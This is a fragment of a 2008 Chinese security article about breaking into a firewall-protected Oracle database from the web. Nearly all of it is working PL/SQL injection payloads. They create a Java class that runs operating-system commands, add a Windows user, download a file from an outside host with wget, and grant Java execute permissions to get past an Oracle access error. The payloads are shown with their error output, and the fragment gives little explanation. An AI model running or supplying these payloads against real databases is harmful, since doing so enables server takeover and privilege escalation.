投递文章
投稿指南
RSS订阅作者: 剑心, 出处:whitecell.org , 责任编辑: 韩博颖,
2008-04-15 09:10
本文只是从一个web安全的角度来看如何入侵一台被防火墙防护的Oracle数据库,对一些入侵技术做了web入侵上的总结和延伸,尽量将原理讲得明白。
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*;import java.io.*;public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command);}};'';END;'; |
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME ''''JAVACMD.execCommand (java.lang.String)'''';'';END;'; |
将shellcode.txt内容换成
| EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin javacmdproc(''''cmd.exe /c net user loveshell loveshell /add'''');end;'';END;'; |
| EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin javacmdproc(''''wget http://www.loveshell.net ;-O /tmp/loveshell'''');end;'';END;'; |
ERROR at line 1:
| ORA-29532: Java call terminated by uncaught Java exception: java.security.AccessControlException: the Permission (java.io.FilePermission <> execute) has not been granted to LOVESHELL. The PL/SQL to grant this is dbms_java.grant_permission( 'LOVESHELL', 'SYS:java.io.FilePermission', '<>', 'execute' ) ORA-06512: at "LOVESHELL.JAVACMDPROC", line 0 ORA-06512: at line 1 |
| EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant javasyspriv to loveshell;'';END;'; EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin exec dbms_java.grant_permission(''''LOVESHELL'''',''''SYS:java.io.FilePermission'''',''''<>'''',''''execute'''');end;'';END;'; |
